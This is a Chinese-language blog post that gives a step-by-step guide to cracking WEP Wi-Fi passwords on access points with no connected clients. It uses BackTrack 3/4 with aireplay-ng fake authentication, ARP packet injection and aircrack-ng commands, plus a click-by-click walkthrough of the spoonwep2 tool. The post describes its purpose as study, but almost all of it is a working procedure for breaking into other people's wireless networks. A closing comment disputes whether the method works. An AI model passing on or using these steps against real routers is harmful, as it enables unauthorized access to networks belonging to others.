前言:在没有客户端的情况下破解 WEP 密码也不是没可能,只要你有设备破解是 100% 的事情!
条件:2 台电脑,2 个无线网卡(不一定要卡X,瑞银也可以,只要支持 BT 破解的无线网卡就行)
1、一台用 BT 里面的 spoonwep 破解,一直让它处于读包状态;
2、一台用 BT 里面 shell 命令手动破解,只要破解到新建一个窗口输入以下命令:
aireplay-ng -1 0 -a 00:00:00:00:00 wlan0
(出现笑脸)就可以了,后面的不要继续了,00:00:00:00:00 是指 ap 的 MAC 地址!
目的:让没有客户端的 WEP 出现一个虚拟连接,达到抓包研究学习的目的
(提示:虚拟连接成功后 WEP 脚本会出现客户端 POW《信号的意思》100 这样更有利于研究学习)虚拟连接成功后,研究学习只要 2 分钟左右。
命令和说明:
此方法为无客户端的情况下,采用注入式暴力破解
1、查看网卡:ifconfig -a
2、加载网卡:ifconfig -a (网卡型号) up
3、打开监听:airmon-ng start wlan0
4、airodump-ng -w 1 -c 频道 wlan0
5、新建一个窗口输入:aireplay-ng -1 0 -a (AP 的 MAC 地址) wlan0 (选择要连接的 A P的 MAC出现笑脸)
6、aireplay-ng -2 -p 0841 -c ffffffffffff(12 个 f) -h (自己用来破解的网卡的 MAC 地址) -b (AP 的 MAC 地址) wlan0 (抓到 arp 注入包提示你按 Y)
按 Y 后会给路由器注入大量数据包,达到一定的程度时可以按 CTRL+C 停止注入
7、开始破解:aircrack-ng -x -f 2 *.cap
下面为 BT3\4 自带 spoonwep2 程序,傻瓜式破解
1、点击黑色小电视机
2、输入命令 spoonwep 等 5-6 秒的时间,弹出窗口
3、选择项目:
- 选择网卡:BT3 选择 WLAN0;BT4 选择 MONO
- 选择驱动:NORMAL
- 选择模式:UNKNOWN VITIM
点击 NEXT 进到下一个界面
4、点下 LAUNCH 扫描
注:只能破解 DATA 有数字的,无数字基本上无法破解,后面有 √ 说明有客户端,前面 ESSID 如果不能显示的也无法破解或者需要另寻办法。
5、选择要破解的路由器点击 SELECTION OK 进到下一个界面
6、有 √ 的路由器选择 ARP REPLAY ATTACK
无 √ 的路由器选择 P0841REPLAY ATTCK
选择??? LENGTH(不制定加密位数,首选)
7、最后点击 LAUNCH 按钮开始自动破解
(在破解过程中任务栏会出现红色的 × 可以点击它,查看破解进度 DATA 到一万多密码就基本上出来了)
原创文章,转载请注明: 转载自穿越
本文链接地址: BT3/4 下碰到 WEP 无客户端,照样拿下
文章的脚注信息由WordPress的wp-posturl插件自动生成
aireplay-ng -2 -p 0841 是监测任何与AP交流的包.再模拟发送..若没有任何正规客户端连接到该AP..你也没辨法 READ到包的…网上很多所谓无客户端破解都是一屁话.